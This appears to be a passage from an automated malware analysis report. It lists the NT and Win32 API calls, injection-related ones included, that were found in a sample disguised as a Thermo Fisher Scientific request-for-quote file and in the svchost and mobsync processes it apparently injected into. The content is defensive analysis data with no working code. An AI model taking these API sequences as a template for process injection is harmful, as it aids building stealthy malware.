                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FA0 NtQuerySection,2_2_03B72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F90 NtProtectVirtualMemory,2_2_03B72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FE0 NtCreateFile,2_2_03B72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F30 NtCreateSection,2_2_03B72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F60 NtCreateProcessEx,2_2_03B72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EA0 NtAdjustPrivilegesToken,2_2_03B72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E80 NtReadVirtualMemory,2_2_03B72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EE0 NtQueueApcThread,2_2_03B72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E30 NtWriteVirtualMemory,2_2_03B72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DB0 NtEnumerateKey,2_2_03B72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DD0 NtDelayExecution,2_2_03B72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D30 NtUnmapViewOfSection,2_2_03B72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D10 NtMapViewOfSection,2_2_03B72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D00 NtSetInformationFile,2_2_03B72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CA0 NtQueryInformationToken,2_2_03B72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CF0 NtOpenProcess,2_2_03B72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CC0 NtQueryVirtualMemory,2_2_03B72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C00 NtQueryInformationProcess,2_2_03B72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C70 NtFreeVirtualMemory,2_2_03B72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C60 NtCreateKey,2_2_03B72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73090 NtSetValueKey,2_2_03B73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73010 NtOpenDirectoryObject,2_2_03B73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B739B0 NtGetContextThread,2_2_03B739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D10 NtOpenProcessToken,2_2_03B73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D70 NtOpenThread,2_2_03B73D70
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04374650 NtSuspendThread,LdrInitializeThunk,5_2_04374650
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04374340 NtSetContextThread,LdrInitializeThunk,5_2_04374340
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04372C70
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372C60 NtCreateKey,LdrInitializeThunk,5_2_04372C60
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_04372CA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_04372D30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04372D10
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_04372DF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372DD0 NtDelayExecution,LdrInitializeThunk,5_2_04372DD0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372EE0 NtQueueApcThread,LdrInitializeThunk,5_2_04372EE0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372F30 NtCreateSection,LdrInitializeThunk,5_2_04372F30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372FB0 NtResumeThread,LdrInitializeThunk,5_2_04372FB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372FE0 NtCreateFile,LdrInitializeThunk,5_2_04372FE0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372AF0 NtWriteFile,LdrInitializeThunk,5_2_04372AF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372AD0 NtReadFile,LdrInitializeThunk,5_2_04372AD0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372B60 NtClose,LdrInitializeThunk,5_2_04372B60
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043735C0 NtCreateMutant,LdrInitializeThunk,5_2_043735C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043739B0 NtGetContextThread,LdrInitializeThunk,5_2_043739B0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372C00 NtQueryInformationProcess,5_2_04372C00
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372CF0 NtOpenProcess,5_2_04372CF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372CC0 NtQueryVirtualMemory,5_2_04372CC0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372D00 NtSetInformationFile,5_2_04372D00
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372DB0 NtEnumerateKey,5_2_04372DB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372E30 NtWriteVirtualMemory,5_2_04372E30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372EA0 NtAdjustPrivilegesToken,5_2_04372EA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372E80 NtReadVirtualMemory,5_2_04372E80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372F60 NtCreateProcessEx,5_2_04372F60
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372FA0 NtQuerySection,5_2_04372FA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372F90 NtProtectVirtualMemory,5_2_04372F90
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372AB0 NtWaitForSingleObject,5_2_04372AB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372BA0 NtEnumerateValueKey,5_2_04372BA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372B80 NtQueryInformationFile,5_2_04372B80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372BF0 NtAllocateVirtualMemory,5_2_04372BF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372BE0 NtQueryValueKey,5_2_04372BE0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04373010 NtOpenDirectoryObject,5_2_04373010
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04373090 NtSetValueKey,5_2_04373090
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04373D10 NtOpenProcessToken,5_2_04373D10
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04373D70 NtOpenThread,5_2_04373D70
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00169100 NtCreateFile,5_2_00169100
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00169270 NtReadFile,5_2_00169270
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00169370 NtDeleteFile,5_2_00169370
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00169410 NtClose,5_2_00169410
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00646606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00646606
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0063ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0063ACC5
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006479D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006479D3
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0062B0430_2_0062B043
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006132000_2_00613200
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00613B700_2_00613B70
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0063410F0_2_0063410F
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006202A40_2_006202A4
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0060E3B00_2_0060E3B0
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0063038E0_2_0063038E
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0063467F0_2_0063467F
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006206D90_2_006206D9
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0066AACE0_2_0066AACE
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00634BEF0_2_00634BEF
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0062CCC10_2_0062CCC1
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0060AF500_2_0060AF50
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00606F070_2_00606F07
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0061B11F0_2_0061B11F
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006631BC0_2_006631BC
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0062D1B90_2_0062D1B9
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0063724D0_2_0063724D
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0062123A0_2_0062123A
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006093F00_2_006093F0
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006413CA0_2_006413CA
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0061F5630_2_0061F563
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006096C00_2_006096C0
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0064B6CC0_2_0064B6CC
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0066F7FF0_2_0066F7FF
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006077B00_2_006077B0
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006379C90_2_006379C9
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0061FA570_2_0061FA57
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00609B600_2_00609B60
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00607D190_2_00607D19
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0061FE6F0_2_0061FE6F
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00629ED00_2_00629ED0
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00607FA30_2_00607FA3
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00D4D6280_2_00D4D628
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004183B32_2_004183B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029292_2_00402929
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029302_2_00402930
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012002_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EAA32_2_0042EAA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FBF32_2_0040FBF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402DF02_2_00402DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DDF32_2_0040DDF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025902_2_00402590
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004165B32_2_004165B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE132_2_0040FE13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF432_2_0040DF43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF372_2_0040DF37
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C003E62_2_03C003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F02_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA3522_2_03BFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC02C02_2_03BC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE02742_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF41A22_2_03BF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C001AA2_2_03C001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF81CC2_2_03BF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA1182_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B301002_2_03B30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC81582_2_03BC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD20002_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C02_2_03B3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B407702_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B647502_2_03B64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C6E02_2_03B5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C005912_2_03C00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B405352_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEE4F62_2_03BEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE44202_2_03BE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF24462_2_03BF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF6BD72_2_03BF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB402_2_03BFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA802_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A02_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0A9A62_2_03C0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B569622_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B268B82_2_03B268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E8F02_2_03B6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4A8402_2_03B4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B428402_2_03B42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBEFA02_2_03BBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4CFE02_2_03B4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC82_2_03B32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60F302_2_03B60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE2F302_2_03BE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B82F282_2_03B82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4F402_2_03BB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52E902_2_03B52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFCE932_2_03BFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEEDB2_2_03BFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEE262_2_03BFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40E592_2_03B40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B58DBF2_2_03B58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3ADE02_2_03B3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDCD1F2_2_03BDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4AD002_2_03B4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0CB52_2_03BE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30CF22_2_03B30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40C002_2_03B40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B8739A2_2_03B8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF132D2_2_03BF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D34C2_2_03B2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B452A02_2_03B452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED2_2_03BE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C02_2_03B5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4B1B02_2_03B4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0B16B2_2_03C0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F1722_2_03B2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7516C2_2_03B7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF70E92_2_03BF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF0E02_2_03BFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF0CC2_2_03BEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C02_2_03B470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF7B02_2_03BFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF16CC2_2_03BF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B856302_2_03B85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDD5B02_2_03BDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF75712_2_03BF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF43F2_2_03BFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B314602_2_03B31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FB802_2_03B5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB5BF02_2_03BB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7DBF92_2_03B7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFB762_2_03BFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDDAAC2_2_03BDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B85AA02_2_03B85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE1AA32_2_03BE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEDAC62_2_03BEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB3A6C2_2_03BB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFA492_2_03BFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7A462_2_03BF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD59102_2_03BD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B499502_2_03B49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B9502_2_03B5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B438E02_2_03B438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD8002_2_03BAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFFB12_2_03BFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41F922_2_03B41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFF092_2_03BFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B49EB02_2_03B49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FDC02_2_03B5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7D732_2_03BF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF1D5A2_2_03BF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B43D402_2_03B43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFCF22_2_03BFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB9C322_2_03BB9C32
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043E44205_2_043E4420
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043F24465_2_043F2446
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043EE4F65_2_043EE4F6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043405355_2_04340535
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_044005915_2_04400591
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0435C6E05_2_0435C6E0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043407705_2_04340770
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043647505_2_04364750
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0433C7C05_2_0433C7C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043D20005_2_043D2000
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043DA1185_2_043DA118
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043301005_2_04330100
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043C81585_2_043C8158
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043F41A25_2_043F41A2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_044001AA5_2_044001AA
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043F81CC5_2_043F81CC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043E02745_2_043E0274
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043C02C05_2_043C02C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043FA3525_2_043FA352
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_044003E65_2_044003E6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0434E3F05_2_0434E3F0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04340C005_2_04340C00
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043E0CB55_2_043E0CB5
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04330CF25_2_04330CF2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043DCD1F5_2_043DCD1F
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0434AD005_2_0434AD00
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04358DBF5_2_04358DBF
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0433ADE05_2_0433ADE0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043FEE265_2_043FEE26
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04340E595_2_04340E59
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04352E905_2_04352E90
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043FCE935_2_043FCE93
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043FEEDB5_2_043FEEDB
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04360F305_2_04360F30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043E2F305_2_043E2F30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04382F285_2_04382F28
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043B4F405_2_043B4F40
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043BEFA05_2_043BEFA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0434CFE05_2_0434CFE0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04332FC85_2_04332FC8
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0434A8405_2_0434A840
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043428405_2_04342840
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043268B85_2_043268B8
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0436E8F05_2_0436E8F0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043569625_2_04356962
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043429A05_2_043429A0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0440A9A65_2_0440A9A6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0433EA805_2_0433EA80
